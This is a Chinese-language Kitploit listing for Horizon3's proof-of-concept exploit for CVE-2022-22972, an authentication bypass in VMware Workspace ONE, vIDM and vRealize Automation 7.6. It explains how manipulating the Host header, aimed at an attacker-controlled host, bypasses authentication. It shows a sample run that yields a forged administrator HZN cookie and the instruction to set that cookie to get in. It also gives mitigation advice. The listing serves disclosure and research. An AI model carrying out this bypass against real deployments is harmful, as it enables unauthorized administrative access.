Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-22972 — 针对CVE-2022-22972的概念验证利用代码,通过Host头操纵绕过VMware Workspace ONE、vIDM和vRealize Automation 7.6中的身份验证。 | Kitploit
工具/GitHubGitHub/horizon3ai/cve-2022-22972
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证红队
GitHubhorizon3ai/cve-2022-22972

CVE-2022-22972

针对CVE-2022-22972的概念验证利用代码,通过Host头操纵绕过VMware Workspace ONE、vIDM和vRealize Automation 7.6中的身份验证。

查看仓库
15027104年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-22972

CVE-2022-22972 的概念验证(POC),影响 VMware Workspace ONE、vIDM 和 vRealize Automation 7.6。

技术分析

该漏洞的技术根因分析可以在我们的博客上找到: https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive

摘要

此脚本可用于通过 CVE-2022-22972 绕过 vRealize Automation 7.6 的身份验证。Workspace ONE 和 vIDM 具有不同的身份验证端点,但漏洞的核心仍然相同。如果您有测试工件来验证流程,我们很乐意接受拉取请求。

该脚本通过更改 VMware 身份验证端点的 HTTP POST 请求中的 Host 标头,将其更改为攻击者控制的主机。这会导致 VMware 应用程序使用凭据信息向该主机发出请求,如果该主机返回 200,则用户成功通过身份验证。

该脚本会生成一个 HZN cookie,可以将其包含在后续请求中,以冒充受感染用户执行操作。

注意:脚本的默认参数会将身份验证请求发送到 我们的 AWS API 网关,该网关配置为对博客中提到的特定端点回复 200。您可以使用 --host 选项更改此设置。在漏洞利用流程中,此端点 不会接收任何敏感数据——只会收到来自易受攻击应用程序的包含伪造认证标头的请求,然后它会回复该请求。

用法

dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint

HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8

Set the HZN cookie in your browser to bypass authentication

缓解措施

更新到最新版本,或按照 VMSA 中的说明进行缓解

  • https://www.vmware.com/security/advisories/VMSA-2022-0014.html

关注 Horizon3.ai 攻击团队在 Twitter 上获取最新安全研究:

  • Horizon3 攻击团队
  • James Horseman
  • Zach Hanley

免责声明

本软件完全出于学术研究和开发有效防御技术的目的而创建,不应用于攻击系统,除非明确授权。项目维护者对软件的滥用不承担任何责任。请负责任地使用。

下载工具